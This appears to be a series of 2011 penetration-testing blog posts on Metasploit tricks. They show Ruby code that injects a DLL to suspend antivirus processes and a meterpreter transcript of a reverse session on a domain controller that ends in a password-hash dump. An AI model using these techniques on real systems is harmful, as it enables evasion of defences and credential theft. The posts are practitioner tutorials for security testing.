Room362.com

Jcran recently blogged about an easy way to run a post module on all sessions:

http://blog.pentestify.com/simple-framework-domain-token-scanner

msf> use post/windows/gather/enum_domain_tokens
msf enum_domain_tokens> irb
framework.sessions.each do |session|
  run_single("set SESSION #{session.first}")
  run_single("run")
  sleep 1
end

You use the POST module, drop to IRB and run those 4 lines, and bam, you win. With resource files we can automate this a bit more and have it so that we do this effortlessly with any post module.

Thinking back to http://blog.metasploit.com/2010/03/automating-metasploit-console.html and my rapid file PSEXEC resource file, we know we can run ruby inside of resource files with the <ruby> tag.

Save the following as runall.rc somewhere where you'll remember:

framework.sessions.each do |session|
  run_single("set SESSION #{session.first}")
  print_status("Running #{active_module.fullname} against session #{session.first}")
  run_single("run")
  sleep 1
end

Then when you want to run a POST module against every session you have you simply do:

msf> use post/windows/gather/enum_domain_tokens
msf enum_domain_tokens> resource runall.rc
[*] Running post/windows/gather/enum_domain_tokens on session 1

Update on Sunday, November 6, 2011 at 3:02PM by Rob Fuller

A commenter noticed an error in the coding for cross compatibility. The following should work better across versions:

 

framework.sessions.each_key do |session|
  run_single("set SESSION #{session}")
  print_status("Running #{active_module.fullname} against session #{session}")
  run_single("run")
  sleep 1
end

In @carnal0wnage and my presentation at DerbyCon 2011 we talked about using SCREEN and SCRIPT to keep connections live / use them across SSH sessions, and log everything that happens. What we didn't cover is the fact that there isn't a time stamp for those logs. Now, Metasploit has multiple ways of creating logs:

Plenty of logging right? But none of them really 'log everything' and time stamps are not a regular occurrence in them. Cool, but we need both. We've got the 'log everything' with the Linux 'script' command, we just need a way to inject time stamps into our log.

Enter the ever mutable 'msf>' prompt:

A lesser known variable in MSFConsole is 'PROMPT'. You can set this pretty much like any other OS can, however there are some metasploit specific things you can add. Using a three letter abbreviation you can even add color to it. 

For example lets add our hostname to our prompt:

• set PROMPT %H

changes msf> to myattackmachine>

And you can combine and add things that you wish:

• set PROMPT %H Just more text %U

changes the prompt to:  myattackmachine Just more text mubix>  (%U is username)

For reference here are the other working % variables that I know of:

• %D = Current local directory (not sure if this changes when in meterpreter or not for the victims dir, that would be cool)
• %H = Host name (again, would be cool if this changed when in meterpreter)
• %J = Current number of jobs running
• %L = Local IP (makes it easy to remember what to put in LHOST)
• %S = Currently number of sessions open
• %T = Time stamp
• %U = Username (yes, would be awesome if this changed in meterpreter too)

Now if you wanted to add colors to that, all you would do is use something like %grn%T to make the time stamp green. You'll have to play around with the color's names as I don't know them all. %red %blu %blk etc...

Combine all of that with script and you've got something awesome. I set my PROMPT to:

• set PROMPT %T S:%S J:%J
• 1970-01-01 00:00:00 +0000 S:0 J:0> 

This gives me the number of jobs and sessions and has the time stamp every time I throw a command, so in my logs I can very easily narrow down the exact time when I did or didnt' do something. The number of sessions and jobs are just good to know items.

Throw in one more trick to make the whole thing a cake walk:

In your ~/.msf4 directory, if you haven't already, create a file called 'msfconsole.rc'. This magical file will run every time you start msfconsole (with the express exception of when you specify a resource file to run from the command line using the -r argument). Throw your 'set PROMPT %blah %blah %blah' in there formatted however you like, and now whenever you start msfconsole you'll have your handy dandy timestamp.

Shout out to @egyp7 for showing me this.

Recently Didier Stevens wrote 'Suspender.dll' which is a DLL that will suspend a process and all of it's child processes after a delay. 60 seconds is it's default but you can rename the DLL to add a number (as such 'Suspender10.dll' for 10 seconds) to make the delay whatever you wish. You can find the blog post and download here: http://blog.didierstevens.com/2011/04/27/suspender-dll/

Jonathan Cran and I had the same idea, as I'm sure many others did as well. This might work against AntiVirus setups that protect themselves from being killed or their services stopped.

I still stand by my original claim that just removing it is easier (Blog Post: Silently Uninstall SEP). However that might be something the user notices (A little shield disappearing).

Well, I didn't know how to do this with meterpreter so a bit of google fu landed me on: http://www.codeproject.com/KB/threads/winspy.aspx which has 3 different ways to attack the 2nd of which used a DLL (score!)

Using IRB within a meterpreter shell I started using Railgun (because once you know something sometimes its easy not too look for other solutions)

I start off setting up some variables after I've uploaded Suspender.dll:

pid = 1436
sizeofsuspend = 52376
pathtosuspend = "C:\\Docume~1\\Administrator\\Desktop\\Suspender10.dll"

Next up we need to open a handle on the target process:

handle = client.railgun.kernel32.OpenProcess(PROCESS_ALL_ACCESS,false,pid)["return"]

With the handle we allocate some memory in the remote process for our DLL to live in:

allocatedmem = client.railgun.kernel32.VirtualAllocEx(handle,nil,sizeofsuspend,MEM_COMMIT,PAGE_READWRITE)["return"]

Writing that DLL to memory isn't much harder: (this and the previous step is the wrong way to do things as we'll see later)

client.railgun.kernel32.WriteProcessMemory(handle,allocatedmem,pathtosuspend,sizeofsuspend,nil)

Here is the hard part. We have to somehow figure out the address LoadLibraryA in the remote processes memory space, accounting for ASLR then pass it the location in memory where our DLL is hiding. Yah, I couldn't figure this one out, here is the best I did:

client.railgun.kernel32.CreateRemoteThread(handle,nil,0,allocatedmem,pathtosuspend,0,nil)

Then I got a friendly reminder by HD that most of this was built into meterpreter already so all that railgun nastness boils down to someting a lot simpler. Set the variables again:

pid = 1436
pathtosuspend = "C:\\Docume~1\\Administrator\\Desktop\\Suspender10.dll"

But this time we are going to use the loadlibrary payload that just got added to Metasploit Framework in r12765. We generate the payload with it pointing at our Suspender DLL:

pay = client.framework.payloads.create("windows/loadlibrary")
pay.datastore['DLL'] = pathtosuspend
pay.datastore['EXITFUNC'] = 'thread'
raw = pay.generate

Open the process, this time with Rex:

targetprocess = client.sys.process.open(pid, PROCESS_ALL_ACCESS)

Allocate the memory in the remote process write the payload (not our DLL) into that space:

mem = targetprocess.memory.allocate(raw.length + (raw.length % 1024))
targetprocess.memory.write(mem, raw)

And finally create the remote thread.. MUCH easier (The power of Rex even over Railgun)

targetprocess.thread.create(mem, 0)

And 10 seconds later our AV and all it's children processes stop. Suspended by Didier's Suspender.DLL. Thanks to HD for the slap in the head that I was doing things the wrong way and the 1 AM update to the framework that made this possible.

When trying to dump password hashes on a Windows 2008 R2 64 bit box I constantly run into the "The parameter is incorrect" error in meterpreter. So I've had to fall back on dropping binaries which I really don't like doing because of the added clean up and chance of getting 'caught'. Well, with a bit of migration you'll be back to passing the hash. Here is how, with a bit of the thought process first:

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##


       =[ metasploit v3.7.1-release [core:3.7 api:1.0]
+ -- --=[ 687 exploits - 364 auxiliary - 43 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
       =[ svn r12622 updated today (2011.05.15)

msf > 
[*] DC_IP:49220 Request received for /AYSBk...
[*] DC_IP:49220 Staging connection for target YSBk received...
[*] Patching Target ID YSBk into DLL
[*] DC_IP:49221 Request received for /BYSBk...
[*] DC_IP:49221 Stage connection for target YSBk received...
[*] Meterpreter session 7 opened (ATTACKER_IP:443 -> DC_IP:49221) at Sun May 15 21:37:31 +0000 2011

msf > sessions -i 7
[*] Starting interaction with 7...

meterpreter > sysinfo
System Language : en_US
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Computer        : DOMAINCONTROLLE
Architecture    : x64 (Current Process is WOW64)
Meterpreter     : x86/win32

meterpreter > ps

Process list
============

 PID   Name                                       Arch  Session  User                          Path
 ---   ----                                       ----  -------  ----                          ----
 0     [System Process]                                                                        
 4     System                                     x64   0                                      
 224   smss.exe                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 324   csrss.exe                                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 364   csrss.exe                                  x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 372   wininit.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
 404   winlogon.exe                               x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 468   services.exe                               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
 476   lsass.exe                                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 484   lsm.exe                                    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe
 628   svchost.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 708   svchost.exe                                x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 804   svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 836   svchost.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 880   svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 932   svchost.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 972   svchost.exe                                x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 328   svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1172  spoolsv.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1204  Microsoft.ActiveDirectory.WebServices.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe
 1252  dfsrs.exe                                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dfsrs.exe
 1288  dns.exe                                    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dns.exe
 1316  ismserv.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\ismserv.exe
 1360  svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1392  vmtoolsd.exe                               x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1464  wlms.exe                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wlms\wlms.exe
 1492  dfssvc.exe                                 x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dfssvc.exe
 1572  VMUpgradeHelper.exe                        x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\VMUpgradeHelper.exe
 1896  TPAutoConnSvc.exe                          x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
 2016  vds.exe                                    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\vds.exe
 872   sppsvc.exe                                 x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\sppsvc.exe
 1268  WmiPrvSE.exe                               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wbem\WmiPrvSE.exe
 2360  taskhost.exe                               x64   1        SITTINGDUCK\juser             C:\Windows\System32\taskhost.exe
 2424  dwm.exe                                    x64   1        SITTINGDUCK\juser             C:\Windows\System32\dwm.exe
 2452  explorer.exe                               x64   1        SITTINGDUCK\juser             C:\Windows\explorer.exe
 2504  TPAutoConnect.exe                          x64   1        SITTINGDUCK\juser             C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
 2512  conhost.exe                                x64   1        SITTINGDUCK\juser             C:\Windows\System32\conhost.exe
 2632  VMwareTray.exe                             x64   1        SITTINGDUCK\juser             C:\Program Files\VMware\VMware Tools\VMwareTray.exe
 2640  VMwareUser.exe                             x64   1        SITTINGDUCK\juser             C:\Program Files\VMware\VMware Tools\VMwareUser.exe
 2716  mmc.exe                                    x64   1        SITTINGDUCK\juser             C:\Windows\System32\mmc.exe
 3052  mscorsvw.exe                               x86   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
 2216  TrustedInstaller.exe                       x64   0        NT AUTHORITY\SYSTEM           C:\Windows\servicing\TrustedInstaller.exe
 1932  mscorsvw.exe                               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
 2564  svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1732  msdtc.exe                                  x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\msdtc.exe
 2992  notepad.exe                                x86   1        SITTINGDUCK\juser             C:\Windows\SysWOW64\notepad.exe
 1720  notepad.exe                                x64   1        SITTINGDUCK\juser             C:\Windows\System32\notepad.exe


meterpreter > getpid
Current pid: 2992

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Ah, the wonderful 'The parameter is incorrect' error. Ok we are an admin since we can see the user for SYSTEM processes, so that isn't the issue, but lets do a 'getprivs' just in case:

meterpreter > getprivs    
============================================================
Enabled Process Privileges
============================================================
  SeDebugPrivilege
  SeIncreaseQuotaPrivilege
  SeMachineAccountPrivilege
  SeSecurityPrivilege
  SeTakeOwnershipPrivilege
  SeLoadDriverPrivilege
  SeSystemProfilePrivilege
  SeSystemtimePrivilege
  SeProfileSingleProcessPrivilege
  SeIncreaseBasePriorityPrivilege
  SeCreatePagefilePrivilege
  SeBackupPrivilege
  SeRestorePrivilege
  SeShutdownPrivilege
  SeSystemEnvironmentPrivilege
  SeChangeNotifyPrivilege
  SeRemoteShutdownPrivilege
  SeUndockPrivilege
  SeEnableDelegationPrivilege
  SeManageVolumePrivilege

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Boo.. Ok, so maybe we have to be 'SYSTEM'...

meterpreter > getsystem
...got system (via technique 1).

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Still nothing... Maybe it requires that we be in a 64 bit process... PID 1720 was 64 bit version of Notepad, lets try that...

meterpreter > migrate 1720
[*] Migrating to 1720...
[*] Migration completed successfully.

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Damn, what about as 'SYSTEM'...

meterpreter > getsystem ...got system (via technique 1).  

meterpreter > hashdump 

[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

No joy.. hmmm What about a 'SYSTEM' process that was already there.. 'dns.exe' PID 1288 should be good...

meterpreter > migrate 1288
[*] Migrating to 1288...
[*] Migration completed successfully.

meterpreter > hashdump
Administrator:500:MYLMHASH:MYNTLMHASH:::
Guest:501:MYLMHASH:MYNTLMHASH:::
krbtgtG:502:MYLMHASH:MYNTLMHASH:::
Domain Admin?:1000:MYLMHASH:MYNTLMHASH:::
juserN:1104:MYLMHASH:MYNTLMHASH:::
jane.user??:1105:MYLMHASH:MYNTLMHASH:::
DOMAINCONTROLLE$?:1001:MYLMHASH:MYNTLMHASH:::

meterpreter > 

w00t. So I don't know why, but it seems that you have to be in a 'SYSTEM' process who's primary token (started by SYSTEM) is SYSTEM (since 'getsystem' wasn't working). I also tried this getting SYSTEM to run a 32 bit process, and was still unable to dump hashes. So next time you're on an Win2k8 R2 64 bit box, remember to migrate into a pre-existing 64bit SYSTEM process and you should be good to go.

Update on Sunday, May 15, 2011 at 7:37PM by Rob Fuller

As Gavin points out in the comments, it is better to run the meterpreter script or post module to do hashdumping on systems. The only time this is not the case is when you are trying to get domain hashes on a domain controller. The registry does not store these hashes (as far as I know). So LSASS injection is the only route and you have to jump through the mentioned hoops.